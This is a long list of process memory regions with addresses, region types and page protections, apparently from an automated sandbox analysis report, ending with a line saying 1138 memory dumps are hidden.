7FFB9AAF0000
trusted library allocation
page execute and read and write
E1CEACD000
stack
page read and write
23E2000
direct allocation
page read and write
1CC57A43000
heap
page read and write
1CC3F666000
trusted library allocation
page read and write
2B12FC02000
heap
page read and write
24CE000
stack
page read and write
3047000
direct allocation
page read and write
690000
heap
page read and write
1E432E90000
heap
page read and write
235EBF1A000
heap
page read and write
21F10000
direct allocation
page execute and read and write
2402BD13000
heap
page read and write
7FFB9ACE0000
trusted library allocation
page read and write
482E000
stack
page read and write
4D8D000
stack
page read and write
22F6000
heap
page read and write
7FFB9ABC0000
trusted library allocation
page execute and read and write
7F970000
direct allocation
page read and write
7FFB9ADF0000
trusted library allocation
page read and write
2C4E3548000
trusted library allocation
page read and write
7FFB9AC40000
trusted library allocation
page read and write
2B12DE89000
heap
page read and write
2402BC96000
heap
page read and write
1CC3D5DB000
heap
page read and write
235EA1EA000
heap
page read and write
19398CC1000
trusted library allocation
page read and write
6FBE07E000
unkown
page readonly
7FFB9AB82000
trusted library allocation
page read and write
1CC4F8D2000
trusted library allocation
page read and write
1CC577A6000
heap
page read and write
7FFC0C626000
unkown
page readonly
7FFB9AC50000
trusted library allocation
page read and write
2C4E34AD000
trusted library allocation
page read and write
2B12DEDB000
heap
page read and write
19398800000
trusted library allocation
page read and write
235EA1B4000
heap
page read and write
7FFC0C626000
unkown
page readonly
5EA000
heap
page read and write
737000
heap
page read and write
1E418B00000
trusted library allocation
page read and write
1F860000
heap
page read and write
1CC3D870000
trusted library allocation
page read and write
2F90000
heap
page read and write
235EA335000
heap
page read and write
2402BC8D000
heap
page read and write
7F980000
direct allocation
page read and write
24031255000
heap
page read and write
2402BC5B000
heap
page read and write
6FBD7AB000
stack
page read and write
749000
heap
page read and write
2C4F9F6D000
heap
page read and write
235EA197000
heap
page read and write
1CC413E0000
trusted library allocation
page read and write
2129E000
stack
page read and write
24032000000
heap
page read and write
1E432993000
heap
page read and write
C65E3FE000
stack
page read and write
C65DEFE000
stack
page read and write
2B12DE7B000
heap
page read and write
7ECD0000
direct allocation
page read and write
2B12DDDE000
heap
page read and write
6DA000
heap
page read and write
1CC40031000
trusted library allocation
page read and write
1E41A711000
trusted library allocation
page read and write
213FE000
stack
page read and write
C65E4FE000
stack
page read and write
2402CCB0000
trusted library section
page readonly
2C39000
heap
page read and write
2C4DFC90000
heap
page read and write
2B12DE86000
heap
page read and write
1E41A873000
trusted library allocation
page read and write
1CC3D6A0000
heap
page read and write
7FFC0C610000
unkown
page readonly
7FFB9AC70000
trusted library allocation
page read and write
7FFB9ACA0000
trusted library allocation
page read and write
2C08000
heap
page read and write
235EBF1B000
heap
page read and write
235EA33C000
heap
page read and write
1E418970000
heap
page read and write
2B12DE89000
heap
page read and write
6FBEB7E000
unkown
page readonly
21500000
heap
page read and write
1F0000
heap
page read and write
24031243000
heap
page read and write
7FFB9ACF0000
trusted library allocation
page read and write
240310D0000
trusted library allocation
page read and write
7FFB9A9DD000
trusted library allocation
page execute and read and write
7FFB9AC90000
trusted library allocation
page read and write
7FFB9ACB5000
trusted library allocation
page read and write
2C4E1710000
trusted library allocation
page read and write
6FBEEFE000
stack
page read and write
240311E0000
trusted library allocation
page read and write
28F2000
direct allocation
page read and write
2CA0000
heap
page read and write
1E418A81000
heap
page read and write
235EBF11000
heap
page read and write
7E760000
direct allocation
page read and write
7FFB9AAA0000
trusted library allocation
page execute and read and write
7FFB9AC40000
trusted library allocation
page read and write
1CC57800000
heap
page read and write
2C4FA170000
heap
page read and write
7FFB9ACE0000
trusted library allocation
page read and write
214EE000
stack
page read and write
7FFB9AB9A000
trusted library allocation
page read and write
1E4328E0000
heap
page execute and read and write
7FFB9A9ED000
trusted library allocation
page execute and read and write
1CC3D800000
trusted library section
page read and write
2402C3D1000
trusted library allocation
page read and write
7FFB9AD03000
trusted library allocation
page read and write
745000
heap
page read and write
B18BA7F000
unkown
page read and write
7E6FF000
direct allocation
page read and write
1E418A1C000
heap
page read and write
2402BCA3000
heap
page read and write
21BC1000
heap
page read and write
7FFB9ABA0000
trusted library allocation
page execute and read and write
E1CDA79000
stack
page read and write
67207B7000
stack
page read and write
2D80000
heap
page read and write
7FFB9AE10000
trusted library allocation
page read and write
2C23000
heap
page read and write
7FFB9AC00000
trusted library allocation
page read and write
7A3000
heap
page read and write
BBFDEFF000
stack
page read and write
2165F000
trusted library allocation
page read and write
7FFC0C611000
unkown
page execute read
2E80000
heap
page read and write
24031250000
heap
page read and write
235EA18F000
heap
page read and write
24031090000
trusted library allocation
page read and write
2C4F9F5C000
heap
page read and write
2C4F9E00000
heap
page read and write
2AE0000
heap
page read and write
28ED000
stack
page read and write
23F0000
direct allocation
page read and write
7F490000
direct allocation
page read and write
235EBF22000
heap
page read and write
212AE000
stack
page read and write
241C000
direct allocation
page read and write
6720ABE000
stack
page read and write
19398DD3000
trusted library allocation
page read and write
2B12DEDB000
heap
page read and write
7FFB9ACB0000
trusted library allocation
page read and write
7FFB9AB81000
trusted library allocation
page read and write
7FFB9A9E2000
trusted library allocation
page read and write
240312FE000
heap
page read and write
29D478F5000
heap
page read and write
21760000
trusted library allocation
page read and write
6FBF0FE000
stack
page read and write
19398DE7000
trusted library allocation
page read and write
7FFB9A9FB000
trusted library allocation
page read and write
6A0000
heap
page read and write
2402C513000
heap
page read and write
7EAB0000
direct allocation
page read and write
77B000
heap
page read and write
2C4DFEE0000
heap
page read and write
19398CDB000
trusted library allocation
page read and write
1E41A829000
trusted library allocation
page read and write
B18BCF9000
stack
page read and write
7EDDF000
direct allocation
page read and write
7FFB9AC60000
trusted library allocation
page read and write
7FFB9A9D4000
trusted library allocation
page read and write
9EE99FF000
stack
page read and write
47A000
unkown
page write copy
3051000
direct allocation
page read and write
1CC3D810000
trusted library section
page read and write
2100E000
stack
page read and write
240312C0000
heap
page read and write
9EE9B3F000
stack
page read and write
2912000
direct allocation
page read and write
A9F000
stack
page read and write
2C4F9F33000
heap
page read and write
24031430000
remote allocation
page read and write
7FFB9AC90000
trusted library allocation
page read and write
240310B0000
trusted library allocation
page read and write
7FFB9AD3C000
trusted library allocation
page read and write
2C4DFD1D000
heap
page read and write
7FFB9AB91000
trusted library allocation
page read and write
1CC407F0000
trusted library allocation
page read and write
193A8CCF000
trusted library allocation
page read and write
19398E23000
trusted library allocation
page read and write
7ED50000
direct allocation
page read and write
193B0E71000
heap
page read and write
1CC401D8000
trusted library allocation
page read and write
6FBFC7E000
unkown
page readonly
1CC3D7A0000
heap
page read and write
7FFB9ABE0000
trusted library allocation
page read and write
7F630000
direct allocation
page read and write
9EE987F000
stack
page read and write
7FFB9AC80000
trusted library allocation
page read and write
21BD5000
heap
page read and write
240310C0000
trusted library allocation
page read and write
29E0000
heap
page read and write
1CC3D5EF000
heap
page read and write
235EBF23000
heap
page read and write
2402C940000
trusted library allocation
page read and write
B18BC7F000
stack
page read and write
29D47590000
heap
page read and write
20E48000
direct allocation
page read and write
2D7D000
heap
page read and write
24031262000
heap
page read and write
3025000
direct allocation
page execute and read and write
2B12FC0D000
heap
page read and write
7E580000
direct allocation
page read and write
2490000
direct allocation
page execute and read and write
7FFB9AB70000
trusted library allocation
page read and write
7FFB9AD29000
trusted library allocation
page read and write
2402BC13000
heap
page read and write
7FFB9AD10000
trusted library allocation
page read and write
20E01000
direct allocation
page read and write
24031430000
remote allocation
page read and write
29D478F0000
heap
page read and write
235EA17B000
heap
page read and write
6720837000
stack
page read and write
1CC408E7000
trusted library allocation
page read and write
2B12FBFA000
heap
page read and write
E1CDABE000
stack
page read and write
1CC3D8A5000
heap
page read and write
1E4189AF000
heap
page read and write
9EE97FE000
stack
page read and write
1E41A700000
heap
page execute and read and write
7FFC0C630000
unkown
page read and write
1CC3D5CF000
heap
page read and write
7FFB9A9D2000
trusted library allocation
page read and write
7F990000
direct allocation
page read and write
72C000
heap
page read and write
63F000
heap
page read and write
2C4DFED0000
trusted library allocation
page read and write
2EC6000
heap
page read and write
7FFB9ACF0000
trusted library allocation
page read and write
235EBF2E000
heap
page read and write
2B12DE7B000
heap
page read and write
1CC40964000
trusted library allocation
page read and write
6FBECFE000
stack
page read and write
2BFF000
stack
page read and write
2513000
heap
page read and write
1E4329AA000
heap
page read and write
E1CD97D000
stack
page read and write
7FFB9ACD0000
trusted library allocation
page read and write
1CC3F448000
heap
page read and write
C65E7FC000
stack
page read and write
7FFB9ABB8000
trusted library allocation
page read and write
6FBEA7E000
unkown
page readonly
21640000
heap
page read and write
2110000
heap
page read and write
19396FAC000
heap
page read and write
2934000
direct allocation
page read and write
19396ED0000
heap
page read and write
7FFB9A9F0000
trusted library allocation
page read and write
7FFB9AC60000
trusted library allocation
page read and write
2E90000
heap
page read and write
1CC579D5000
heap
page read and write
1E41A75F000
trusted library allocation
page read and write
235EA185000
heap
page read and write
7EC7D000
direct allocation
page read and write
24031010000
trusted library allocation
page read and write
213AF000
stack
page read and write
2F3D000
stack
page read and write
7FFB9AB82000
trusted library allocation
page read and write
2402C502000
heap
page read and write
2104F000
stack
page read and write
2ECA000
heap
page read and write
2B12DEA9000
heap
page read and write
7FFB9AB00000
trusted library allocation
page execute and read and write
C65E2FF000
stack
page read and write
2403130B000
heap
page read and write
7FFB9AA90000
trusted library allocation
page read and write
7F980000
direct allocation
page read and write
7FFB9AD60000
trusted library allocation
page read and write
1E41AC3A000
trusted library allocation
page read and write
67200D3000
stack
page read and write
2402CC60000
trusted library section
page readonly
3055000
direct allocation
page execute and read and write
235EA2B0000
heap
page read and write
20E24000
direct allocation
page read and write
2414000
direct allocation
page read and write
B18BEF9000
stack
page read and write
7E580000
direct allocation
page read and write
1CC40F2E000
trusted library allocation
page read and write
7EDDF000
direct allocation
page read and write
1E4328E6000
heap
page execute and read and write
2C70000
heap
page read and write
BBFDE7F000
stack
page read and write
294A000
direct allocation
page read and write
24031200000
heap
page read and write
7FFB9AAB6000
trusted library allocation
page execute and read and write
7FFB9ACC0000
trusted library allocation
page read and write
E1CDBBC000
stack
page read and write
235EA150000
heap
page read and write
24031290000
heap
page read and write
20E3A000
direct allocation
page read and write
7FFB9A9F0000
trusted library allocation
page read and write
E1CE9CF000
stack
page read and write
2DA0000
heap
page read and write
1CC5774E000
heap
page read and write
2D50000
heap
page read and write
7FFB9AD30000
trusted library allocation
page read and write
1E418AD0000
trusted library allocation
page read and write
2B12DE90000
heap
page read and write
2B12DF03000
heap
page read and write
2402C500000
heap
page read and write
7FFB9AD30000
trusted library allocation
page read and write
474000
unkown
page read and write
7FFB9A9E3000
trusted library allocation
page execute and read and write
1CC3D780000
heap
page read and write
1E41ABBD000
trusted library allocation
page read and write
20E41000
direct allocation
page read and write
1CC407B7000
trusted library allocation
page read and write
193B0F01000
heap
page read and write
2C8A000
heap
page read and write
7E45B000
direct allocation
page read and write
224C000
direct allocation
page read and write
2402BC74000
heap
page read and write
2C9E000
unkown
page read and write
67208B9000
stack
page read and write
1CC40E47000
trusted library allocation
page read and write
7FFC0C610000
unkown
page readonly
2C4DFEB0000
trusted library allocation
page read and write
2B12FBF0000
heap
page read and write
2403122C000
heap
page read and write
5EE000
heap
page read and write
1E432AF0000
heap
page execute and read and write
7E500000
direct allocation
page read and write
235EA120000
heap
page read and write
1E42A783000
trusted library allocation
page read and write
1CC3D5DD000
heap
page read and write
7FFB9AC10000
trusted library allocation
page read and write
5A2000
unkown
page readonly
1CC401CA000
trusted library allocation
page read and write
2402D000000
trusted library allocation
page read and write
7FFB9AAC6000
trusted library allocation
page execute and read and write
193A8CC1000
trusted library allocation
page read and write
770000
heap
page read and write
1CC4035C000
trusted library allocation
page read and write
779000
heap
page read and write
7FFB9ACE0000
trusted library allocation
page read and write
1E432B10000
heap
page read and write
7FFB9ABD0000
trusted library allocation
page execute and read and write
235EBF2F000
heap
page read and write
24031090000
trusted library allocation
page read and write
7FFB9ACF0000
trusted library allocation
page read and write
1E4189DA000
heap
page read and write
24031302000
heap
page read and write
1CC57785000
heap
page read and write
5994DFE000
stack
page read and write
1CC4F654000
trusted library allocation
page read and write
E1CDD3E000
stack
page read and write
2B12DE70000
heap
page read and write
1CC41400000
trusted library allocation
page read and write
2402BBF0000
trusted library section
page read and write
E1CD9FD000
stack
page read and write
193A8D33000
trusted library allocation
page read and write
4C4E000
stack
page read and write
672067F000
stack
page read and write
9EE9BBF000
stack
page read and write
1CC4F5E1000
trusted library allocation
page read and write
2C4F9D80000
heap
page read and write
7FFB9AD00000
trusted library allocation
page read and write
7FFB9AC40000
trusted library allocation
page read and write
2B12DE87000
heap
page read and write
7FFB9ABD0000
trusted library allocation
page read and write
2CFE000
stack
page read and write
1E41A837000
trusted library allocation
page read and write
2FF1000
direct allocation
page execute read
7FFB9AC30000
trusted library allocation
page read and write
291F000
direct allocation
page read and write
7FFB9AC50000
trusted library allocation
page read and write
20E7B000
stack
page read and write
1E418830000
heap
page read and write
2B12DE7B000
heap
page read and write
2DEE000
stack
page read and write
2E70000
heap
page read and write
6720B3B000
stack
page read and write
7FFB9ABE0000
trusted library allocation
page read and write
225A000
direct allocation
page read and write
7FFB9ABB4000
trusted library allocation
page read and write
B18BE77000
stack
page read and write
1CC3FAAD000
trusted library allocation
page read and write
B18BBFA000
stack
page read and write
2C50000
heap
page read and write
235EA1EA000
heap
page read and write
2402BBB0000
heap
page read and write
6FBEE7E000
unkown
page readonly
2402BAD0000
heap
page read and write
2C4F1E86000
trusted library allocation
page read and write
1CC3D5E1000
heap
page read and write
20D7C000
stack
page read and write
240311F0000
trusted library allocation
page read and write
235EA129000
heap
page read and write
2B12DE9D000
heap
page read and write
2403125B000
heap
page read and write
7FFB9AAF0000
trusted library allocation
page execute and read and write
2951000
direct allocation
page read and write
6FBDE7E000
unkown
page readonly
2402CC70000
trusted library section
page readonly
2B12DEA9000
heap
page read and write
2F80000
heap
page read and write
7FFB9A9E4000
trusted library allocation
page read and write
240312FC000
heap
page read and write
2402C400000
heap
page read and write
24031000000
trusted library allocation
page read and write
240310C0000
trusted library allocation
page read and write
2C4F9F10000
heap
page read and write
7FFB9ABC2000
trusted library allocation
page read and write
7FFB9AD20000
trusted library allocation
page read and write
7FFC0C630000
unkown
page read and write
7FFB9ADE0000
trusted library allocation
page read and write
59952FE000
stack
page read and write
1F0000
heap
page read and write
2C4E1B4C000
heap
page read and write
1CC57720000
heap
page read and write
672083E000
stack
page read and write
2C4E38FC000
trusted library allocation
page read and write
20FCF000
stack
page read and write
1CC4F8CD000
trusted library allocation
page read and write
29ED000
stack
page read and write
1CC3D5D1000
heap
page read and write
6FBF37C000
stack
page read and write
1CC57722000
heap
page read and write
2B12DE95000
heap
page read and write
301F000
unkown
page read and write
223D000
direct allocation
page read and write
7FFB9ABA0000
trusted library allocation
page execute and read and write
7E120000
direct allocation
page read and write
1E418B25000
heap
page read and write
240312F3000
heap
page read and write
1CC41405000
trusted library allocation
page read and write
235EA19F000
heap
page read and write
E1CE88E000
stack
page read and write
235EA14B000
heap
page read and write
7FFB9ACC0000
trusted library allocation
page read and write
7FFB9AA86000
trusted library allocation
page read and write
297C000
stack
page read and write
9B000
stack
page read and write
2C4E16D3000
trusted library allocation
page read and write
20FE000
stack
page read and write
1E432928000
heap
page read and write
29D47790000
heap
page read and write
235EA150000
heap
page read and write
20E16000
direct allocation
page read and write
235EA174000
heap
page read and write
2B12DDD5000
heap
page read and write
2431000
direct allocation
page read and write
22CC000
stack
page read and write
4BCC000
stack
page read and write
1E418A17000
heap
page read and write
478000
direct allocation
page execute and read and write
E1CDC39000
stack
page read and write
7FFB9AC30000
trusted library allocation
page read and write
2C4E17F5000
heap
page read and write
20ECE000
stack
page read and write
235EA33B000
heap
page read and write
30C0000
heap
page read and write
2152E000
stack
page read and write
2987000
heap
page read and write
1CC579C6000
heap
page read and write
2958000
direct allocation
page read and write
240312EB000
heap
page read and write
235EA1B4000
heap
page read and write
235EA0B0000
heap
page read and write
400000
unkown
page readonly
235EA19C000
heap
page read and write
7FFB9AD24000
trusted library allocation
page read and write
27E5000
stack
page read and write
2C4E2902000
trusted library allocation
page read and write
248E000
stack
page read and write
20E1D000
direct allocation
page read and write
193B0FB0000
heap
page read and write
19398CB0000
heap
page read and write
1CC3D820000
trusted library allocation
page read and write
20E2C000
direct allocation
page read and write
2C4B000
heap
page read and write
E1CD87D000
stack
page read and write
235EA090000
heap
page read and write
235EA192000
heap
page read and write
2C4DFCD5000
heap
page read and write
2C52000
heap
page read and write
1CC3F390000
trusted library allocation
page read and write
7FFC0C630000
unkown
page read and write
7EC90000
direct allocation
page read and write
7FFB9ABF0000
trusted library allocation
page read and write
213EE000
stack
page read and write
20F4F000
stack
page read and write
655000
heap
page read and write
7FFB9ABD0000
trusted library allocation
page execute and read and write
304C000
direct allocation
page read and write
7FB0B000
direct allocation
page read and write
2402C415000
heap
page read and write
2B12DE73000
heap
page read and write
21890000
heap
page read and write
7FFB9ACE2000
trusted library allocation
page read and write
2402CC80000
trusted library section
page readonly
1E41A83D000
trusted library allocation
page read and write
2C4E1CC0000
heap
page execute and read and write
740000
heap
page read and write
7E500000
direct allocation
page read and write
7FFB9AC50000
trusted library allocation
page read and write
2188F000
trusted library allocation
page read and write
2B12DEA9000
heap
page read and write
6FBE87E000
unkown
page readonly
2C4E1D59000
trusted library allocation
page read and write
235EBF10000
heap
page read and write
2C4E1CD1000
trusted library allocation
page read and write
1E418AB0000
trusted library allocation
page read and write
19398B70000
trusted library allocation
page read and write
19398E29000
trusted library allocation
page read and write
7FFB9AD20000
trusted library allocation
page read and write
1E4328F0000
heap
page read and write
B18C1FB000
stack
page read and write
E1CD6FE000
stack
page read and write
29D47770000
heap
page read and write
19398DED000
trusted library allocation
page read and write
19398D0F000
trusted library allocation
page read and write
2B12DE8E000
heap
page read and write
500F000
stack
page read and write
7FFB9AC20000
trusted library allocation
page read and write
242A000
direct allocation
page read and write
B18BB7E000
stack
page read and write
5B0000
heap
page read and write
9EE9F3C000
stack
page read and write
2402BC7A000
heap
page read and write
2A90000
heap
page read and write
91F000
stack
page read and write
7FFB9AD50000
trusted library allocation
page read and write
2C4E3900000
trusted library allocation
page read and write
7FFB9AA2C000
trusted library allocation
page execute and read and write
3130000
heap
page read and write
30A0000
heap
page read and write
193991EA000
trusted library allocation
page read and write
7FC07000
direct allocation
page read and write
7FFC0C611000
unkown
page execute read
235EBF15000
heap
page read and write
7FFB9AE40000
trusted library allocation
page read and write
B18CD4C000
stack
page read and write
2402BD02000
heap
page read and write
672057E000
stack
page read and write
1CC57650000
heap
page execute and read and write
2C4E3836000
trusted library allocation
page read and write
401000
unkown
page execute read
E1CDE3C000
stack
page read and write
7FFB9AC80000
trusted library allocation
page read and write
5994CFA000
stack
page read and write
2402BCB4000
heap
page read and write
1CC57A4C000
heap
page read and write
29D47598000
heap
page read and write
2253000
direct allocation
page read and write
59953FD000
stack
page read and write
7E720000
direct allocation
page read and write
6FBF1FE000
unkown
page readonly
1E432A10000
heap
page read and write
475000
direct allocation
page execute and read and write
7FFB9ABF0000
trusted library allocation
page read and write
1CC3D850000
heap
page readonly
7FFB9A9E4000
trusted library allocation
page read and write
1E418990000
heap
page read and write
22F0000
heap
page read and write
7ECE0000
direct allocation
page read and write
7EB6F000
direct allocation
page read and write
7ECE0000
direct allocation
page read and write
7F7D0000
direct allocation
page read and write
2402CC90000
trusted library section
page readonly
2943000
direct allocation
page read and write
235EA1EA000
heap
page read and write
1CC3F5E1000
trusted library allocation
page read and write
1CC579FA000
heap
page read and write
6FBDD77000
stack
page read and write
1E41AC15000
trusted library allocation
page read and write
2C4F1CD1000
trusted library allocation
page read and write
7FFB9AC30000
trusted library allocation
page read and write
19398DEA000
trusted library allocation
page read and write
235EA18D000
heap
page read and write
67209BE000
stack
page read and write
6FBEAFE000
stack
page read and write
7FCB0000
direct allocation
page read and write
7FFB9AC90000
trusted library allocation
page read and write
2403130A000
heap
page read and write
7DF40A640000
trusted library allocation
page execute and read and write
216B2000
heap
page read and write
2C4E16D0000
trusted library allocation
page read and write
250E000
stack
page read and write
7FFB9A9E0000
trusted library allocation
page read and write
1CC3D8A0000
heap
page read and write
774000
heap
page read and write
7FA10000
direct allocation
page read and write
1CC3D61C000
heap
page read and write
BBFDBBD000
stack
page read and write
E1CE94E000
stack
page read and write
7FFB9AA96000
trusted library allocation
page read and write
2B12FC02000
heap
page read and write
4FCE000
stack
page read and write
4D4F000
stack
page read and write
6FBE9FE000
stack
page read and write
7FFC0C630000
unkown
page read and write
1CC40545000
trusted library allocation
page read and write
1939916F000
trusted library allocation
page read and write
4C0D000
stack
page read and write
6FBE77B000
stack
page read and write
7EC70000
direct allocation
page read and write
B18BD7D000
stack
page read and write
2402C55A000
heap
page read and write
6FBEDFE000
stack
page read and write
7EDDF000
direct allocation
page read and write
2C4E343A000
trusted library allocation
page read and write
1E418910000
heap
page read and write
There are 1138 hidden memdumps, click here to show them.